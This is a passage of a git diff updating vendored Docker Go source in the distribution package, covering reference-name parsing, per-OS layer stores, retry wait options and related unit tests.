hmacKey []byte, marr []metadata.V2Metadata) { // reverse the metadata array to shift the newest entries to the beginning for i := 0; i < len(marr)/2; i++ { @@ -661,7 +678,7 @@ func sortV2MetadataByLikenessAndAge(repoInfo reference.Named, hmacKey []byte, ma sort.Stable(byLikeness{ arr: marr, hmacKey: hmacKey, - pathComponents: getPathComponents(repoInfo.FullName()), + pathComponents: getPathComponents(repoInfo.Name()), }) } @@ -678,11 +695,6 @@ func numOfMatchingPathComponents(pth string, matchComponents []string) int { } func getPathComponents(path string) []string { - // make sure to add docker.io/ prefix to the path - named, err := reference.ParseNamed(path) - if err == nil { - path = named.FullName() - } return strings.Split(path, "/") } diff --git a/vendor/github.com/docker/docker/distribution/push_v2_test.go b/vendor/github.com/docker/docker/distribution/push_v2_test.go index 6a5216b1d0..436b4a1797 100644 --- a/vendor/github.com/docker/docker/distribution/push_v2_test.go +++ b/vendor/github.com/docker/docker/distribution/push_v2_test.go @@ -1,19 +1,23 @@ -package distribution +package distribution // import "github.com/docker/docker/distribution" import ( + "context" "net/http" + "net/url" "reflect" "testing" "github.com/docker/distribution" - "github.com/docker/distribution/context" - "github.com/docker/distribution/digest" "github.com/docker/distribution/manifest/schema2" - distreference "github.com/docker/distribution/reference" + "github.com/docker/distribution/reference" + "github.com/docker/distribution/registry/api/errcode" + "github.com/docker/docker/api/types" "github.com/docker/docker/distribution/metadata" "github.com/docker/docker/layer" "github.com/docker/docker/pkg/progress" - "github.com/docker/docker/reference" + refstore "github.com/docker/docker/reference" + "github.com/docker/docker/registry" + "github.com/opencontainers/go-digest" ) func TestGetRepositoryMountCandidates(t *testing.T) { @@ -43,8 +47,8 @@ func TestGetRepositoryMountCandidates(t *testing.T) { name: "one item matching", targetRepo: "busybox", maxCandidates: -1, - metadata: []metadata.V2Metadata{taggedMetadata("hash", "1", "hello-world")}, - candidates: []metadata.V2Metadata{taggedMetadata("hash", "1", "hello-world")}, + metadata: []metadata.V2Metadata{taggedMetadata("hash", "1", "docker.io/library/hello-world")}, + candidates: []metadata.V2Metadata{taggedMetadata("hash", "1", "docker.io/library/hello-world")}, }, { name: "allow missing SourceRepository", @@ -63,13 +67,13 @@ func TestGetRepositoryMountCandidates(t *testing.T) { maxCandidates: -1, metadata: []metadata.V2Metadata{ {Digest: digest.Digest("1"), SourceRepository: "docker.io/user/foo"}, - {Digest: digest.Digest("3"), SourceRepository: "user/bar"}, - {Digest: digest.Digest("2"), SourceRepository: "app"}, + {Digest: digest.Digest("3"), SourceRepository: "docker.io/user/bar"}, + {Digest: digest.Digest("2"), SourceRepository: "docker.io/library/app"}, }, candidates: []metadata.V2Metadata{ - {Digest: digest.Digest("3"), SourceRepository: "user/bar"}, + {Digest: digest.Digest("3"), SourceRepository: "docker.io/user/bar"}, {Digest: digest.Digest("1"), SourceRepository: "docker.io/user/foo"}, - {Digest: digest.Digest("2"), SourceRepository: "app"}, + {Digest: digest.Digest("2"), SourceRepository: "docker.io/library/app"}, }, }, { @@ -78,10 +82,10 @@ func TestGetRepositoryMountCandidates(t *testing.T) { targetRepo: "127.0.0.1/foo/bar", maxCandidates: -1, metadata: []metadata.V2Metadata{ - taggedMetadata("hash", "1", "hello-world"), + taggedMetadata("hash", "1", "docker.io/library/hello-world"), taggedMetadata("efgh", "2", "127.0.0.1/hello-world"), - taggedMetadata("abcd", "3", "busybox"), - taggedMetadata("hash", "4", "busybox"), + taggedMetadata("abcd", "3", "docker.io/library/busybox"), + taggedMetadata("hash", "4", "docker.io/library/busybox"), taggedMetadata("hash", "5", "127.0.0.1/foo"), taggedMetadata("hash", "6", "127.0.0.1/bar"), taggedMetadata("efgh", "7", "127.0.0.1/foo/bar"), @@ -105,23 +109,25 @@ func TestGetRepositoryMountCandidates(t *testing.T) { targetRepo: "user/app", maxCandidates: 3, metadata: []metadata.V2Metadata{ - taggedMetadata("abcd", "1", "user/app1"), - taggedMetadata("abcd", "2", "user/app/base"), - taggedMetadata("hash", "3", "user/app"), + taggedMetadata("abcd", "1", "docker.io/user/app1"), + taggedMetadata("abcd", "2", "docker.io/user/app/base"), + taggedMetadata("hash", "3", "docker.io/user/app"), taggedMetadata("abcd", "4", "127.0.0.1/user/app"), - taggedMetadata("hash", "5", "user/foo"), - taggedMetadata("hash", "6", "app/bar"), + taggedMetadata("hash", "5", "docker.io/user/foo"), + taggedMetadata("hash", "6", "docker.io/app/bar"), }, candidates: []metadata.V2Metadata{ // first by matching hash - taggedMetadata("abcd", "2", "user/app/base"), - taggedMetadata("abcd", "1", "user/app1"), + taggedMetadata("abcd", "2", "docker.io/user/app/base"), + taggedMetadata("abcd", "1", "docker.io/user/app1"), // then by longest matching prefix - taggedMetadata("hash", "3", "user/app"), + // "docker.io/usr/app" is excluded since candidates must + // be from a different repository + taggedMetadata("hash", "5", "docker.io/user/foo"), }, }, } { - repoInfo, err := reference.ParseNamed(tc.targetRepo) + repoInfo, err := reference.ParseNormalizedNamed(tc.targetRepo) if err != nil { t.Fatalf("[%s] failed to parse reference name: %v", tc.name, err) } @@ -184,7 +190,7 @@ func TestLayerAlreadyExists(t *testing.T) { expectedRequests: []string{"apple"}, }, { - name: "not matching reposies", + name: "not matching repositories", targetRepo: "busybox", maxExistenceChecks: 3, metadata: []metadata.V2Metadata{ @@ -202,12 +208,15 @@ func TestLayerAlreadyExists(t *testing.T) { checkOtherRepositories: true, metadata: []metadata.V2Metadata{ {Digest: digest.Digest("apple"), SourceRepository: "docker.io/library/hello-world"}, - {Digest: digest.Digest("orange"), SourceRepository: "docker.io/library/busybox/subapp"}, + {Digest: digest.Digest("orange"), SourceRepository: "docker.io/busybox/subapp"}, {Digest: digest.Digest("pear"), SourceRepository: "docker.io/busybox"}, - {Digest: digest.Digest("plum"), SourceRepository: "busybox"}, + {Digest: digest.Digest("plum"), SourceRepository: "docker.io/library/busybox"}, {Digest: digest.Digest("banana"), SourceRepository: "127.0.0.1/busybox"}, }, - expectedRequests: []string{"plum", "pear", "apple", "orange", "banana"}, + expectedRequests: []string{"plum", "apple", "pear", "orange", "banana"}, + expectedRemovals: []metadata.V2Metadata{ + {Digest: digest.Digest("plum"), SourceRepository: "docker.io/library/busybox"}, + }, }, { name: "find existing blob", @@ -374,7 +383,7 @@ func TestLayerAlreadyExists(t *testing.T) { }, }, } { - repoInfo, err := reference.ParseNamed(tc.targetRepo) + repoInfo, err := reference.ParseNormalizedNamed(tc.targetRepo) if err != nil { t.Fatalf("[%s] failed to parse reference name: %v", tc.name, err) } @@ -457,6 +466,158 @@ func TestLayerAlreadyExists(t *testing.T) { } } +type mockReferenceStore struct { +} + +func (s *mockReferenceStore) References(id digest.Digest) []reference.Named { + return []reference.Named{} +} +func (s *mockReferenceStore) ReferencesByName(ref reference.Named) []refstore.Association { + return []refstore.Association{} +} +func (s *mockReferenceStore) AddTag(ref reference.Named, id digest.Digest, force bool) error { + return nil +} +func (s *mockReferenceStore) AddDigest(ref reference.Canonical, id digest.Digest, force bool) error { + return nil +} +func (s *mockReferenceStore) Delete(ref reference.Named) (bool, error) { + return true, nil +} +func (s *mockReferenceStore) Get(ref reference.Named) (digest.Digest, error) { + return "", nil +} + +func TestWhenEmptyAuthConfig(t *testing.T) { + for _, authInfo := range []struct { + username string + password string + registryToken string + expected bool + }{ + { + username: "", + password: "", + registryToken: "", + expected: false, + }, + { + username: "username", + password: "password", + registryToken: "", + expected: true, + }, + { + username: "", + password: "", + registryToken: "token", + expected: true, + }, + } { + imagePushConfig := &ImagePushConfig{} + imagePushConfig.AuthConfig = &types.AuthConfig{ + Username: authInfo.username, + Password: authInfo.password, + RegistryToken: authInfo.registryToken, + } + imagePushConfig.ReferenceStore = &mockReferenceStore{} + repoInfo, _ := reference.ParseNormalizedNamed("xujihui1985/test.img") + pusher := &v2Pusher{ + config: imagePushConfig, + repoInfo: ®istry.RepositoryInfo{ + Name: repoInfo, + }, + endpoint: registry.APIEndpoint{ + URL: &url.URL{ + Scheme: "https", + Host: "index.docker.io", + }, + Version: registry.APIVersion1, + TrimHostname: true, + }, + } + pusher.Push(context.Background()) + if pusher.pushState.hasAuthInfo != authInfo.expected { + t.Errorf("hasAuthInfo does not match expected: %t != %t", authInfo.expected, pusher.pushState.hasAuthInfo) + } + } +} + +type mockBlobStoreWithCreate struct { + mockBlobStore + repo *mockRepoWithBlob +} + +func (blob *mockBlobStoreWithCreate) Create(ctx context.Context, options ...distribution.BlobCreateOption) (distribution.BlobWriter, error) { + return nil, errcode.Errors(append([]error{errcode.ErrorCodeUnauthorized.WithMessage("unauthorized")})) +} + +type mockRepoWithBlob struct { + mockRepo +} + +func (m *mockRepoWithBlob) Blobs(ctx context.Context) distribution.BlobStore { + blob := &mockBlobStoreWithCreate{} + blob.mockBlobStore.repo = &m.mockRepo + blob.repo = m + return blob +} + +type mockMetadataService struct { + mockV2MetadataService +} + +func (m *mockMetadataService) GetMetadata(diffID layer.DiffID) ([]metadata.V2Metadata, error) { + return []metadata.V2Metadata{ + taggedMetadata("abcd", "sha256:ff3a5c916c92643ff77519ffa742d3ec61b7f591b6b7504599d95a4a41134e28", "docker.io/user/app1"), + taggedMetadata("abcd", "sha256:ff3a5c916c92643ff77519ffa742d3ec61b7f591b6b7504599d95a4a41134e22", "docker.io/user/app/base"), + taggedMetadata("hash", "sha256:ff3a5c916c92643ff77519ffa742d3ec61b7f591b6b7504599d95a4a41134e23", "docker.io/user/app"), + taggedMetadata("abcd", "sha256:ff3a5c916c92643ff77519ffa742d3ec61b7f591b6b7504599d95a4a41134e24", "127.0.0.1/user/app"), + taggedMetadata("hash", "sha256:ff3a5c916c92643ff77519ffa742d3ec61b7f591b6b7504599d95a4a41134e25", "docker.io/user/foo"), + taggedMetadata("hash", "sha256:ff3a5c916c92643ff77519ffa742d3ec61b7f591b6b7504599d95a4a41134e26", "docker.io/app/bar"), + }, nil +} + +var removeMetadata bool + +func (m *mockMetadataService) Remove(metadata metadata.V2Metadata) error { + removeMetadata = true + return nil +} + +func TestPushRegistryWhenAuthInfoEmpty(t *testing.T) { + repoInfo, _ := reference.ParseNormalizedNamed("user/app") + ms := &mockMetadataService{} + remoteErrors := map[digest.Digest]error{digest.Digest("sha256:apple"): distribution.ErrAccessDenied} + remoteBlobs := map[digest.Digest]distribution.Descriptor{digest.Digest("sha256:apple"): {Digest: digest.Digest("shar256:apple")}} + repo := &mockRepoWithBlob{ + mockRepo: mockRepo{ + t: t, + errors: remoteErrors, + blobs: remoteBlobs, + requests: []string{}, + }, + } + pd := &v2PushDescriptor{ + hmacKey: []byte("abcd"), + repoInfo: repoInfo, + layer: &storeLayer{ + Layer: layer.EmptyLayer, + }, + repo: repo, + v2MetadataService: ms, + pushState: &pushState{ + remoteLayers: make(map[layer.DiffID]distribution.Descriptor), + hasAuthInfo: false, + }, + checkedDigests: make(map[digest.Digest]struct{}), + } + pd.Upload(context.Background(), &progressSink{t}) + if removeMetadata { + t.Fatalf("expect remove not be called but called") + } +} + func taggedMetadata(key string, dgst string, sourceRepo string) metadata.V2Metadata { meta := metadata.V2Metadata{ Digest: digest.Digest(dgst), @@ -476,7 +637,7 @@ type mockRepo struct { var _ distribution.Repository = &mockRepo{} -func (m *mockRepo) Named() distreference.Named { +func (m *mockRepo) Named() reference.Named { m.t.Fatalf("Named() not implemented") return nil } diff --git a/vendor/github.com/docker/docker/distribution/registry.go b/vendor/github.com/docker/docker/distribution/registry.go index 95e181ded8..8b46aaad6d 100644 --- a/vendor/github.com/docker/docker/distribution/registry.go +++ b/vendor/github.com/docker/docker/distribution/registry.go @@ -1,6 +1,7 @@ -package distribution +package distribution // import "github.com/docker/docker/distribution" import ( + "context" "fmt" "net" "net/http" @@ -8,7 +9,7 @@ import ( "github.com/docker/distribution" "github.com/docker/distribution/manifest/schema2" - distreference "github.com/docker/distribution/reference" + "github.com/docker/distribution/reference" "github.com/docker/distribution/registry/client" "github.com/docker/distribution/registry/client/auth" "github.com/docker/distribution/registry/client/transport" @@ -16,7 +17,6 @@ import ( "github.com/docker/docker/dockerversion" "github.com/docker/docker/registry" "github.com/docker/go-connections/sockets" - "golang.org/x/net/context" ) // ImageTypes represents the schema2 config types for images @@ -55,10 +55,10 @@ func init() { // providing timeout settings and authentication support, and also verifies the // remote API version. func NewV2Repository(ctx context.Context, repoInfo *registry.RepositoryInfo, endpoint registry.APIEndpoint, metaHeaders http.Header, authConfig *types.AuthConfig, actions ...string) (repo distribution.Repository, foundVersion bool, err error) { - repoName := repoInfo.FullName() + repoName := repoInfo.Name.Name() // If endpoint does not support CanonicalName, use the RemoteName instead if endpoint.TrimHostname { - repoName = repoInfo.RemoteName() + repoName = reference.Path(repoInfo.Name) } direct := &net.Dialer{ @@ -82,7 +82,7 @@ func NewV2Repository(ctx context.Context, repoInfo *registry.RepositoryInfo, end base.Dial = proxyDialer.Dial } - modifiers := registry.DockerHeaders(dockerversion.DockerUserAgent(ctx), metaHeaders) + modifiers := registry.Headers(dockerversion.DockerUserAgent(ctx), metaHeaders) authTransport := transport.NewTransport(base, modifiers...) challengeManager, foundVersion, err := registry.PingV2Registry(endpoint.URL, authTransport) @@ -122,7 +122,7 @@ func NewV2Repository(ctx context.Context, repoInfo *registry.RepositoryInfo, end } tr := transport.NewTransport(base, modifiers...) - repoNameRef, err := distreference.ParseNamed(repoName) + repoNameRef, err := reference.WithName(repoName) if err != nil { return nil, foundVersion, fallbackError{ err: err, @@ -131,7 +131,7 @@ func NewV2Repository(ctx context.Context, repoInfo *registry.RepositoryInfo, end } } - repo, err = client.NewRepository(ctx, repoNameRef, endpoint.URL.String(), tr) + repo, err = client.NewRepository(repoNameRef, endpoint.URL.String(), tr) if err != nil { err = fallbackError{ err: err, diff --git a/vendor/github.com/docker/docker/distribution/registry_unit_test.go b/vendor/github.com/docker/docker/distribution/registry_unit_test.go index 406de34915..5ae529d23d 100644 --- a/vendor/github.com/docker/docker/distribution/registry_unit_test.go +++ b/vendor/github.com/docker/docker/distribution/registry_unit_test.go @@ -1,20 +1,19 @@ -package distribution +package distribution // import "github.com/docker/docker/distribution" import ( + "context" "net/http" "net/http/httptest" "net/url" - "os" + "runtime" "strings" "testing" - "github.com/Sirupsen/logrus" + "github.com/docker/distribution/reference" "github.com/docker/docker/api/types" registrytypes "github.com/docker/docker/api/types/registry" - "github.com/docker/docker/reference" "github.com/docker/docker/registry" - "github.com/docker/docker/utils" - "golang.org/x/net/context" + "github.com/sirupsen/logrus" ) const secretRegistryToken = "mysecrettoken" @@ -38,12 +37,6 @@ func (h *tokenPassThruHandler) ServeHTTP(w http.ResponseWriter, r *http.Request) } func testTokenPassThru(t *testing.T, ts *httptest.Server) { - tmp, err := utils.TestDirectory("") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmp) - uri, err := url.Parse(ts.URL) if err != nil { t.Fatalf("could not parse url from test server: %v", err) @@ -56,11 +49,10 @@ func testTokenPassThru(t *testing.T, ts *httptest.Server) { Official: false, TrimHostname: false, TLSConfig: nil, - //VersionHeader: "verheader", } - n, _ := reference.ParseNamed("testremotename") + n, _ := reference.ParseNormalizedNamed("testremotename") repoInfo := ®istry.RepositoryInfo{ - Named: n, + Name: n, Index: ®istrytypes.IndexInfo{ Name: "testrepo", Mirrors: nil, @@ -92,7 +84,7 @@ func testTokenPassThru(t *testing.T, ts *httptest.Server) { logrus.Debug("About to pull") // We expect it to fail, since we haven't mock'd the full registry exchange in our handler above tag, _ := reference.WithTag(n, "tag_goes_here") - _ = p.pullV2Repository(ctx, tag) + _ = p.pullV2Repository(ctx, tag, runtime.GOOS) } func TestTokenPassThru(t *testing.T) { diff --git a/vendor/github.com/docker/docker/distribution/utils/progress.go b/vendor/github.com/docker/docker/distribution/utils/progress.go index ef8ecc89f6..73ee2be61e 100644 --- a/vendor/github.com/docker/docker/distribution/utils/progress.go +++ b/vendor/github.com/docker/docker/distribution/utils/progress.go @@ -1,4 +1,4 @@ -package utils +package utils // import "github.com/docker/docker/distribution/utils" import ( "io" @@ -6,15 +6,15 @@ import ( "os" "syscall" - "github.com/Sirupsen/logrus" "github.com/docker/docker/pkg/progress" "github.com/docker/docker/pkg/streamformatter" + "github.com/sirupsen/logrus" ) // WriteDistributionProgress is a helper for writing progress from chan to JSON // stream with an optional cancel function. func WriteDistributionProgress(cancelFunc func(), outStream io.Writer, progressChan <-chan progress.Progress) { - progressOutput := streamformatter.NewJSONStreamFormatter().NewProgressOutput(outStream, false) + progressOutput := streamformatter.NewJSONProgressOutput(outStream, false) operationCancelled := false for prog := range progressChan { diff --git a/vendor/github.com/docker/docker/distribution/xfer/download.go b/vendor/github.com/docker/docker/distribution/xfer/download.go index 7545342212..e8cda93628 100644 --- a/vendor/github.com/docker/docker/distribution/xfer/download.go +++ b/vendor/github.com/docker/docker/distribution/xfer/download.go @@ -1,19 +1,21 @@ -package xfer +package xfer // import "github.com/docker/docker/distribution/xfer" import ( + "context" "errors" "fmt" "io" + "runtime" "time" - "github.com/Sirupsen/logrus" "github.com/docker/distribution" "github.com/docker/docker/image" "github.com/docker/docker/layer" "github.com/docker/docker/pkg/archive" "github.com/docker/docker/pkg/ioutils" "github.com/docker/docker/pkg/progress" - "golang.org/x/net/context" + "github.com/docker/docker/pkg/system" + "github.com/sirupsen/logrus" ) const maxDownloadAttempts = 5 @@ -22,21 +24,27 @@ const maxDownloadAttempts = 5 // registers and downloads those, taking into account dependencies between // layers. type LayerDownloadManager struct { - layerStore layer.Store - tm TransferManager + layerStores map[string]layer.Store + tm TransferManager + waitDuration time.Duration } -// SetConcurrency set the max concurrent downloads for each pull +// SetConcurrency sets the max concurrent downloads for each pull func (ldm *LayerDownloadManager) SetConcurrency(concurrency int) { ldm.tm.SetConcurrency(concurrency) } // NewLayerDownloadManager returns a new LayerDownloadManager. -func NewLayerDownloadManager(layerStore layer.Store, concurrencyLimit int) *LayerDownloadManager { - return &LayerDownloadManager{ - layerStore: layerStore, - tm: NewTransferManager(concurrencyLimit), +func NewLayerDownloadManager(layerStores map[string]layer.Store, concurrencyLimit int, options ...func(*LayerDownloadManager)) *LayerDownloadManager { + manager := LayerDownloadManager{ + layerStores: layerStores, + tm: NewTransferManager(concurrencyLimit), + waitDuration: time.Second, + } + for _, option := range options { + option(&manager) } + return &manager } type downloadTransfer struct { @@ -87,8 +95,8 @@ type DownloadDescriptorWithRegistered interface { // the layer store, and the key is not used by an in-progress download, the // Download method is called to get the layer tar data. Layers are then // registered in the appropriate order. The caller must call the returned -// release function once it is is done with the returned RootFS object. -func (ldm *LayerDownloadManager) Download(ctx context.Context, initialRootFS image.RootFS, layers []DownloadDescriptor, progressOutput progress.Output) (image.RootFS, func(), error) { +// release function once it is done with the returned RootFS object. +func (ldm *LayerDownloadManager) Download(ctx context.Context, initialRootFS image.RootFS, os string, layers []DownloadDescriptor, progressOutput progress.Output) (image.RootFS, func(), error) { var ( topLayer layer.Layer topDownload *downloadTransfer @@ -98,6 +106,15 @@ func (ldm *LayerDownloadManager) Download(ctx context.Context, initialRootFS ima downloadsByKey = make(map[string]*downloadTransfer) ) + // Assume that the operating system is the host OS if blank, and validate it + // to ensure we don't cause a panic by an invalid index into the layerstores. + if os == "" { + os = runtime.GOOS + } + if !system.IsOSSupported(os) { + return image.RootFS{}, nil, system.ErrNotSupportedOperatingSystem + } + rootFS := initialRootFS for _, descriptor := range layers { key := descriptor.Key() @@ -109,17 +126,22 @@ func (ldm *LayerDownloadManager) Download(ctx context.Context, initialRootFS ima if err == nil { getRootFS := rootFS getRootFS.Append(diffID) - l, err := ldm.layerStore.Get(getRootFS.ChainID()) + l, err := ldm.layerStores[os].Get(getRootFS.ChainID()) if err == nil { // Layer already exists. logrus.Debugf("Layer already exists: %s", descriptor.ID()) progress.Update(progressOutput, descriptor.ID(), "Already exists") if topLayer != nil { - layer.ReleaseAndLog(ldm.layerStore, topLayer) + layer.ReleaseAndLog(ldm.layerStores[os], topLayer) } topLayer = l missingLayer = false rootFS.Append(diffID) + // Register this repository as a source of this layer. + withRegistered, hasRegistered := descriptor.(DownloadDescriptorWithRegistered) + if hasRegistered { // As layerstore may set the driver + withRegistered.Registered(diffID) + } continue } } @@ -129,7 +151,7 @@ func (ldm *LayerDownloadManager) Download(ctx context.Context, initialRootFS ima // the stack? If so, avoid downloading it more than once. var topDownloadUncasted Transfer if existingDownload, ok := downloadsByKey[key]; ok { - xferFunc := ldm.makeDownloadFuncFromDownload(descriptor, existingDownload, topDownload) + xferFunc := ldm.makeDownloadFuncFromDownload(descriptor, existingDownload, topDownload, os) defer topDownload.Transfer.Release(watcher) topDownloadUncasted, watcher = ldm.tm.Transfer(transferKey, xferFunc, progressOutput) topDownload = topDownloadUncasted.(*downloadTransfer) @@ -141,10 +163,10 @@ func (ldm *LayerDownloadManager) Download(ctx context.Context, initialRootFS ima var xferFunc DoFunc if topDownload != nil { - xferFunc = ldm.makeDownloadFunc(descriptor, "", topDownload) + xferFunc = ldm.makeDownloadFunc(descriptor, "", topDownload, os) defer topDownload.Transfer.Release(watcher) } else { - xferFunc = ldm.makeDownloadFunc(descriptor, rootFS.ChainID(), nil) + xferFunc = ldm.makeDownloadFunc(descriptor, rootFS.ChainID(), nil, os) } topDownloadUncasted, watcher = ldm.tm.Transfer(transferKey, xferFunc, progressOutput) topDownload = topDownloadUncasted.(*downloadTransfer) @@ -154,7 +176,7 @@ func (ldm *LayerDownloadManager) Download(ctx context.Context, initialRootFS ima if topDownload == nil { return rootFS, func() { if topLayer != nil { - layer.ReleaseAndLog(ldm.layerStore, topLayer) + layer.ReleaseAndLog(ldm.layerStores[os], topLayer) } }, nil } @@ -165,7 +187,7 @@ func (ldm *LayerDownloadManager) Download(ctx context.Context, initialRootFS ima defer func() { if topLayer != nil { - layer.ReleaseAndLog(ldm.layerStore, topLayer) + layer.ReleaseAndLog(ldm.layerStores[os], topLayer) } }() @@ -201,11 +223,11 @@ func (ldm *LayerDownloadManager) Download(ctx context.Context, initialRootFS ima // complete before the registration step, and registers the downloaded data // on top of parentDownload's resulting layer. Otherwise, it registers the // layer on top of the ChainID given by parentLayer. -func (ldm *LayerDownloadManager) makeDownloadFunc(descriptor DownloadDescriptor, parentLayer layer.ChainID, parentDownload *downloadTransfer) DoFunc { +func (ldm *LayerDownloadManager) makeDownloadFunc(descriptor DownloadDescriptor, parentLayer layer.ChainID, parentDownload *downloadTransfer, os string) DoFunc { return func(progressChan chan<- progress.Progress, start <-chan struct{}, inactive chan<- struct{}) Transfer { d := &downloadTransfer{ Transfer: NewTransfer(), - layerStore: ldm.layerStore, + layerStore: ldm.layerStores[os], } go func() { @@ -269,7 +291,7 @@ func (ldm *LayerDownloadManager) makeDownloadFunc(descriptor DownloadDescriptor, logrus.Errorf("Download failed, retrying: %v", err) delay := retries * 5 - ticker := time.NewTicker(time.Second) + ticker := time.NewTicker(ldm.waitDuration) selectLoop: for { @@ -365,11 +387,11 @@ func (ldm *LayerDownloadManager) makeDownloadFunc(descriptor DownloadDescriptor, // parentDownload. This function does not log progress output because it would // interfere with the progress reporting for sourceDownload, which has the same // Key. -func (ldm *LayerDownloadManager) makeDownloadFuncFromDownload(descriptor DownloadDescriptor, sourceDownload *downloadTransfer, parentDownload *downloadTransfer) DoFunc { +func (ldm *LayerDownloadManager) makeDownloadFuncFromDownload(descriptor DownloadDescriptor, sourceDownload *downloadTransfer, parentDownload *downloadTransfer, os string) DoFunc { return func(progressChan chan<- progress.Progress, start <-chan struct{}, inactive chan<- struct{}) Transfer { d := &downloadTransfer{ Transfer: NewTransfer(), - layerStore: ldm.layerStore, + layerStore: ldm.layerStores[os], } go func() { diff --git a/vendor/github.com/docker/docker/distribution/xfer/download_test.go b/vendor/github.com/docker/docker/distribution/xfer/download_test.go index bc20e1e7ec..4ab3705af6 100644 --- a/vendor/github.com/docker/docker/distribution/xfer/download_test.go +++ b/vendor/github.com/docker/docker/distribution/xfer/download_test.go @@ -1,7 +1,8 @@ -package xfer +package xfer // import "github.com/docker/docker/distribution/xfer" import ( "bytes" + "context" "errors" "fmt" "io" @@ -12,11 +13,10 @@ import ( "time" "github.com/docker/distribution" - "github.com/docker/distribution/digest" "github.com/docker/docker/image" "github.com/docker/docker/layer" "github.com/docker/docker/pkg/progress" - "golang.org/x/net/context" + "github.com/opencontainers/go-digest" ) const maxDownloadConcurrency = 3 @@ -26,6 +26,7 @@ type mockLayer struct { diffID layer.DiffID chainID layer.ChainID parent layer.Layer + os string } func (ml *mockLayer) TarStream() (io.ReadCloser, error) { @@ -126,7 +127,7 @@ func (ls *mockLayerStore) Get(chainID layer.ChainID) (layer.Layer, error) { func (ls *mockLayerStore) Release(l layer.Layer) ([]layer.Metadata, error) { return []layer.Metadata{}, nil } -func (ls *mockLayerStore) CreateRWLayer(string, layer.ChainID, string, layer.MountInit, map[string]string) (layer.RWLayer, error) { +func (ls *mockLayerStore) CreateRWLayer(string, layer.ChainID, *layer.CreateRWLayerOpts) (layer.RWLayer, error) { return nil, errors.New("not implemented") } @@ -265,8 +266,11 @@ func TestSuccessfulDownload(t *testing.T) { if runtime.GOOS == "windows" { t.Skip("Needs fixing on Windows") } + layerStore := &mockLayerStore{make(map[layer.ChainID]*mockLayer)} - ldm := NewLayerDownloadManager(layerStore, maxDownloadConcurrency) + lsMap := make(map[string]layer.Store) + lsMap[runtime.GOOS] = layerStore + ldm := NewLayerDownloadManager(lsMap, maxDownloadConcurrency, func(m *LayerDownloadManager) { m.waitDuration = time.Millisecond }) progressChan := make(chan progress.Progress) progressDone := make(chan struct{}) @@ -291,7 +295,7 @@ func TestSuccessfulDownload(t *testing.T) { } firstDescriptor.diffID = l.DiffID() - rootFS, releaseFunc, err := ldm.Download(context.Background(), *image.NewRootFS(), descriptors, progress.ChanOutput(progressChan)) + rootFS, releaseFunc, err := ldm.Download(context.Background(), *image.NewRootFS(), runtime.GOOS, descriptors, progress.ChanOutput(progressChan)) if err != nil { t.Fatalf("download error: %v", err) } @@ -327,8 +331,10 @@ func TestSuccessfulDownload(t *testing.T) { } func TestCancelledDownload(t *testing.T) { - ldm := NewLayerDownloadManager(&mockLayerStore{make(map[layer.ChainID]*mockLayer)}, maxDownloadConcurrency) - + layerStore := &mockLayerStore{make(map[layer.ChainID]*mockLayer)} + lsMap := make(map[string]layer.Store) + lsMap[runtime.GOOS] = layerStore + ldm := NewLayerDownloadManager(lsMap, maxDownloadConcurrency, func(m *LayerDownloadManager) { m.waitDuration = time.Millisecond }) progressChan := make(chan progress.Progress) progressDone := make(chan struct{}) @@ -346,7 +352,7 @@ func TestCancelledDownload(t *testing.T) { }() descriptors := downloadDescriptors(nil) - _, _, err := ldm.Download(ctx, *image.NewRootFS(), descriptors, progress.ChanOutput(progressChan)) + _, _, err := ldm.Download(ctx, *image.NewRootFS(), runtime.GOOS, descriptors, progress.ChanOutput(progressChan)) if err != context.Canceled { t.Fatal("expected download to be cancelled") } diff --git a/vendor/github.com/docker/docker/distribution/xfer/transfer.go b/vendor/github.com/docker/docker/distribution/xfer/transfer.go index 14f15660ac..c356fde8d3 100644 --- a/vendor/github.com/docker/docker/distribution/xfer/transfer.go +++ b/vendor/github.com/docker/docker/distribution/xfer/transfer.go @@ -1,11 +1,11 @@ -package xfer +package xfer // import "github.com/docker/docker/distribution/xfer" import ( + "context" "runtime" "sync" "github.com/docker/docker/pkg/progress" - "golang.org/x/net/context" ) // DoNotRetry is an error wrapper indicating that the error cannot be resolved @@ -300,7 +300,7 @@ func NewTransferManager(concurrencyLimit int) TransferManager { } } -// SetConcurrency set the concurrencyLimit +// SetConcurrency sets the concurrencyLimit func (tm *transferManager) SetConcurrency(concurrency int) { tm.mu.Lock() tm.concurrencyLimit = concurrency diff --git a/vendor/github.com/docker/docker/distribution/xfer/transfer_test.go b/vendor/github.com/docker/docker/distribution/xfer/transfer_test.go index 6c50ce3524..a86e27959e 100644 --- a/vendor/github.com/docker/docker/distribution/xfer/transfer_test.go +++ b/vendor/github.com/docker/docker/distribution/xfer/transfer_test.go @@ -1,4 +1,4 @@ -package xfer +package xfer // import "github.com/docker/docker/distribution/xfer" import ( "sync/atomic" diff --git a/vendor/github.com/docker/docker/distribution/xfer/upload.go b/vendor/github.com/docker/docker/distribution/xfer/upload.go index ad3398369c..33b45ad747 100644 --- a/vendor/github.com/docker/docker/distribution/xfer/upload.go +++ b/vendor/github.com/docker/docker/distribution/xfer/upload.go @@ -1,14 +1,14 @@ -package xfer +package xfer // import "github.com/docker/docker/distribution/xfer" import ( + "context" "errors" "time" - "github.com/Sirupsen/logrus" "github.com/docker/distribution" "github.com/docker/docker/layer" "github.com/docker/docker/pkg/progress" - "golang.org/x/net/context" + "github.com/sirupsen/logrus" ) const maxUploadAttempts = 5 @@ -16,19 +16,25 @@ const maxUploadAttempts = 5 // LayerUploadManager provides task management and progress reporting for // uploads. type LayerUploadManager struct { - tm TransferManager + tm TransferManager + waitDuration time.Duration } -// SetConcurrency set the max concurrent uploads for each push +// SetConcurrency sets the max concurrent uploads for each push func (lum *LayerUploadManager) SetConcurrency(concurrency int) { lum.tm.SetConcurrency(concurrency) } // NewLayerUploadManager returns a new LayerUploadManager. -func NewLayerUploadManager(concurrencyLimit int) *LayerUploadManager { - return &LayerUploadManager{ - tm: NewTransferManager(concurrencyLimit), +func NewLayerUploadManager(concurrencyLimit int, options ...func(*LayerUploadManager)) *LayerUploadManager { + manager := LayerUploadManager{ + tm: NewTransferManager(concurrencyLimit), + waitDuration: time.Second, } + for _, option := range options { + option(&manager) + } + return &manager } type uploadTransfer struct { @@ -142,7 +148,7 @@ func (lum *LayerUploadManager) makeUploadFunc(descriptor UploadDescriptor) DoFun logrus.Errorf("Upload failed, retrying: %v", err) delay := retries * 5 - ticker := time.NewTicker(time.Second) + ticker := 